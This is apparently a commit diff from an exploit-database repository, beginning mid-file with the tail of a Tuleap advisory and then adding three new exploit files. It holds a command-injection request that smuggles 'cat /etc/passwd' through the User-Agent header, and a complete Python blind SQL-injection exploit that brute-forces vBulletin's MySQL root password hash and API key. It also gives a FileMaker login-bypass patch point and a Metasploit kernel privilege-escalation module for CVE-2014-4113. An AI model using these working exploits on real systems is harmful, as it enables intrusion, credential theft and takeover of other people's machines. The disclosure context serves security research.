This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
|
||||
|
||||
After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
|
||||
|
||||
|
||||
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
|
||||
Host: [IP]
|
||||
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: https://[IP]/svn/?group_id=102
|
||||
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
|
||||
Connection: keep-alive
|
||||
Cache-Control: max-age=0
|
||||
|
||||
|
||||
Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
|
||||
|
||||
|
||||
Further details at:
|
||||
|
||||
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
233
platforms/php/webapps/35102.py
Executable file
233
platforms/php/webapps/35102.py
Executable file
|
@ -0,0 +1,233 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
'''
|
||||
@author: tintinweb 0x721427D8
|
||||
'''
|
||||
import urllib2, urllib
|
||||
import xmlrpclib,re, urllib2,string,itertools,time
|
||||
from distutils.version import LooseVersion
|
||||
|
||||
|
||||
class Exploit(object):
|
||||
def __init__(self, target, debug=0 ):
|
||||
self.stopwatch_start=time.time()
|
||||
self.target = target
|
||||
self.path = target
|
||||
self.debug=debug
|
||||
if not self.target.endswith("mobiquo.php"):
|
||||
self.path = self.detect_tapatalk()
|
||||
if not self.path:
|
||||
raise Exception("Could not detect tapatalk or version not supported!")
|
||||
self.rpc_connect()
|
||||
self.attack_func = self.attack_2
|
||||
|
||||
def detect_tapatalk(self):
|
||||
# request page, check for tapatalk banner
|
||||
handlers = [
|
||||
urllib2.HTTPHandler(debuglevel=self.debug),
|
||||
urllib2.HTTPSHandler(debuglevel=self.debug),
|
||||
|
||||
]
|
||||
ua = urllib2.build_opener(*handlers)
|
||||
ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
|
||||
data = ua.open(self.target).read()
|
||||
if self.debug:
|
||||
print data
|
||||
if not "tapatalkDetect()" in data:
|
||||
print "[xx] could not detect tapatalk. bye..."
|
||||
return None
|
||||
|
||||
# extract tapatalk version
|
||||
print "[ i] Taptalk detected ... ",
|
||||
path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
|
||||
path+="mobiquo.php"
|
||||
print "'%s' ... "%path,
|
||||
data = urllib.urlopen(path).read()
|
||||
version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
|
||||
if LooseVersion(version) <= LooseVersion("5.2.1"):
|
||||
print "v.%s :) - OK"%version
|
||||
return path
|
||||
print "v.%s :( - not vulnerable"%version
|
||||
return None
|
||||
|
||||
def rpc_connect(self):
|
||||
self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
|
||||
|
||||
def attack_1(self, sqli, sleep=2):
|
||||
|
||||
'''
|
||||
SELECT subscribethreadid
|
||||
FROM subscribethread AS subscribethread
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribethreadid = <INJECTION>
|
||||
AND subscribethreadid.userid = 0";
|
||||
|
||||
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
|
||||
'''
|
||||
|
||||
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
|
||||
query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
|
||||
|
||||
if self.debug:
|
||||
print """ SELECT subscribethreadid
|
||||
FROM subscribethread AS subscribethread
|
||||
LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
|
||||
WHERE subscribethreadid = %s
|
||||
AND subscribethread.userid = 0"""%query
|
||||
|
||||
return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
|
||||
|
||||
def attack_2(self, sqli, sleep=2):
|
||||
'''
|
||||
SELECT subscribeforumid
|
||||
FROM subscribeforum AS subscribeforum
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribeforumid = <INJECTION>
|
||||
AND subscribeforum.userid = 0";
|
||||
|
||||
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
|
||||
'''
|
||||
|
||||
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
|
||||
query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
|
||||
|
||||
if self.debug:
|
||||
print """ SELECT subscribeforumid
|
||||
FROM subscribeforum AS subscribeforum
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribeforumid = %s
|
||||
AND subscribeforum.userid = 0"""%query
|
||||
|
||||
return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
|
||||
|
||||
def attack_blind(self,sqli,sleep=2):
|
||||
return self.attack_func(sqli,sleep=sleep)
|
||||
#return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
|
||||
|
||||
def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
|
||||
'''
|
||||
provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
|
||||
'''
|
||||
|
||||
|
||||
hit = False
|
||||
# PHASE 1 - guess entry length
|
||||
print "[ ] trying to guess length ..."
|
||||
for guess_length in xrange(maxlength+1):
|
||||
q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
|
||||
|
||||
self.stopwatch()
|
||||
self.attack_blind(q, sleep)
|
||||
duration = self.stopwatch()
|
||||
|
||||
print ".",
|
||||
|
||||
if duration >= sleep-sleep/8:
|
||||
# HIT! - got length! => guess_length
|
||||
hit = True
|
||||
print ""
|
||||
break
|
||||
|
||||
if not hit:
|
||||
print "[ !!] unable to guess password length, check query!"
|
||||
return None
|
||||
|
||||
|
||||
print "[ *] LENGTH = %s"%guess_length
|
||||
|
||||
# PHASE 2 - guess password up to length
|
||||
print "[ ] trying to guess value ..."
|
||||
hits = 0
|
||||
result = ""
|
||||
for pos in xrange(guess_length):
|
||||
# for each char pos in up to guessed length
|
||||
for attempt in self.bruteforce(charset, 1):
|
||||
# probe all chars in charset
|
||||
#attempt = re.escape(attempt)
|
||||
if attempt == "%%":
|
||||
attempt= "\%"
|
||||
#LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
|
||||
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
|
||||
|
||||
self.stopwatch()
|
||||
self.attack_blind(q, sleep)
|
||||
duration = self.stopwatch()
|
||||
|
||||
#print result,attempt," ",duration
|
||||
print ".",
|
||||
if duration >= sleep-sleep/8:
|
||||
if case:
|
||||
# case insensitive hit - recheck case: this is drastically reducing queries needed.
|
||||
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
|
||||
self.stopwatch()
|
||||
self.attack_blind(q, sleep)
|
||||
duration = self.stopwatch()
|
||||
if duration >= sleep-sleep/8:
|
||||
attempt = attempt.lower()
|
||||
else:
|
||||
attempt = attempt.upper()
|
||||
# case sensitive - end
|
||||
|
||||
|
||||
|
||||
# HIT! - got length! => guess_length
|
||||
hits += 1
|
||||
print ""
|
||||
print "[ +] HIT! - %s[%s].."%(result,attempt)
|
||||
result += attempt
|
||||
break
|
||||
|
||||
if not hits==guess_length:
|
||||
print "[ !!] unable to guess password length, check query!"
|
||||
return None
|
||||
|
||||
print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result))
|
||||
return result
|
||||
|
||||
def bruteforce(self, charset, maxlength):
|
||||
return (''.join(candidate)
|
||||
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
|
||||
for i in range(1, maxlength + 1)))
|
||||
|
||||
def stopwatch(self):
|
||||
stop = time.time()
|
||||
diff = stop - self.stopwatch_start
|
||||
self.stopwatch_start=stop
|
||||
return diff
|
||||
|
||||
if __name__=="__main__":
|
||||
#googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
|
||||
DEBUG = False
|
||||
TARGET = "http://TARGET/vbb4/forum.php"
|
||||
x = Exploit(TARGET,debug=DEBUG)
|
||||
|
||||
print "[ ] TAPATALK for vBulletin 4.x - SQLi"
|
||||
print "[--] Target: %s"%TARGET
|
||||
if DEBUG: print "[--] DEBUG-Mode!"
|
||||
|
||||
print "[ +] Attack - sqli"
|
||||
|
||||
|
||||
query = u"-1 UNION SELECT 1%s"%unichr(0)
|
||||
if DEBUG:
|
||||
print u""" SELECT subscribeforumid
|
||||
FROM subscribeforum AS subscribeforum
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribeforumid = %s
|
||||
AND subscribeforum.userid = 0"""%query
|
||||
|
||||
|
||||
print "[ *] guess mysql user/pass"
|
||||
print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>",
|
||||
column="password",
|
||||
charset="*"+string.hexdigits,
|
||||
maxlength=45) # usually 40 chars + 1 (*)
|
||||
|
||||
print "[ *] guess apikey"
|
||||
print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
|
||||
column='value',
|
||||
charset=string.ascii_letters+string.digits,
|
||||
maxlength=14,
|
||||
)
|
||||
|
||||
print "-- done --"
|
64
platforms/windows/local/35077.txt
Executable file
64
platforms/windows/local/35077.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
Filemaker Login Bypass and Privilege Escalation
|
||||
=======================================================================
|
||||
|
||||
[ADVISORY INFORMATION]
|
||||
|
||||
Title: Filemaker Login Bypass and Privilege Escalation
|
||||
Discovery date: 19/10/2014
|
||||
Release date: 19/10/2014
|
||||
Vendor Homepage: www.filemaker.com
|
||||
Version: Filemaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
|
||||
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
|
||||
|
||||
[VULNERABILITY INFORMATION]
|
||||
|
||||
Class: Authentication Bypass and Privilege Escalation
|
||||
Category: Desktop Application
|
||||
Severity: High
|
||||
CVSS v2 Vector: 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C
|
||||
|
||||
[AFFECTED PRODUCTS]
|
||||
|
||||
This security vulnerability affects:
|
||||
|
||||
* FileMaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
|
||||
|
||||
[VULNERABILITY DETAILS]
|
||||
|
||||
There is a obvious vulnerability of FileMaker that allow access to the local FM-based database file:
|
||||
On DBEngine dll, there is a function called MatchPasswordData:
|
||||
|
||||
...
|
||||
...
|
||||
...
|
||||
5BB8D53A C68424 74020000 >MOV BYTE PTR SS:[ESP+274],0
|
||||
5BB8D542 FF15 D437D25B CALL DWORD PTR DS:[<&Support.??1PasswordHash@Draco@@QAE@XZ>] <-- Compute the password's hash.
|
||||
5BB8D548 8B8C24 6C020000 MOV ECX,DWORD PTR SS:[ESP+26C]
|
||||
5BB8D54F 5F POP EDI
|
||||
5BB8D550 5E POP ESI
|
||||
5BB8D551 8AC3 MOV AL,BL <-- if AL is 0 then you are not authenticated else if AL is 1 you are authenticated,
|
||||
so simply by changing a single bit you are able to bypass the login,
|
||||
also if your username is Admin, you can obtain a privilege escalation and full permissions on DB.
|
||||
5BB8D553 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
|
||||
5BB8D55A 5B POP EBX
|
||||
5BB8D55B 8BE5 MOV ESP,EBP
|
||||
5BB8D55D 5D POP EBP
|
||||
5BB8D55E C2 0400 RETN 4
|
||||
...
|
||||
...
|
||||
...
|
||||
|
||||
|
||||
it doesn't matter if your desktop or mobile application is developed in a "secure manner", your confidential data on the database can be accessed.
|
||||
|
||||
[DISCLOSURE TIME-LINE]
|
||||
|
||||
* 19/10/2014 - Public disclosure and simultaneously initial vendor contact.
|
||||
|
||||
[DISCLAIMER]
|
||||
|
||||
The author is not responsible for the misuse of the information provided in
|
||||
this security advisory. The advisory is a service to the professional security
|
||||
community. There are NO WARRANTIES with regard to this information. Any
|
||||
application or distribution of this information constitutes acceptance AS IS,
|
||||
at the user's own risk. This information is subject to change without notice.
|
158
platforms/windows/local/35101.rb
Executable file
158
platforms/windows/local/35101.rb
Executable file
|
@ -0,0 +1,158 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
|
||||
'Description' => %q{
|
||||
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
|
||||
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
||||
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
||||
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
||||
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
|
||||
2008 R2 SP1 64 bits.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # vulnerability discovery and exploit in the wild
|
||||
'juan vazquez', # msf module (x86 target)
|
||||
'Spencer McIntyre' # msf module (x64 target)
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested on (32 bits):
|
||||
# * Windows XP SP3
|
||||
# * Windows 2003 SP2
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
# Tested on (64 bits):
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008 R2 SP1
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-4113'],
|
||||
['OSVDB', '113167'],
|
||||
['BID', '70364'],
|
||||
['MSB', 'MS14-058'],
|
||||
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 14 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def check
|
||||
os = sysinfo["OS"]
|
||||
|
||||
if os !~ /windows/i
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||
arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x86/i
|
||||
arch = ARCH_X86
|
||||
end
|
||||
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||
|
||||
# Neither target suports Windows 8 or 8.1
|
||||
return Exploit::CheckCode::Safe if build == 9200
|
||||
return Exploit::CheckCode::Safe if build == 9600
|
||||
|
||||
if arch == ARCH_X86
|
||||
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
|
||||
else
|
||||
return Exploit::CheckCode::Detected if build == 7601
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_system?
|
||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
|
||||
begin
|
||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Reader Sandbox won't allow to create a new process:
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_status('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
if target.arch.first == ARCH_X86
|
||||
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
end
|
||||
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Injecting exploit into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status('Payload injected. Executing exploit...')
|
||||
process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
|
||||
end
|
Loading…
Add table
Reference in a new issue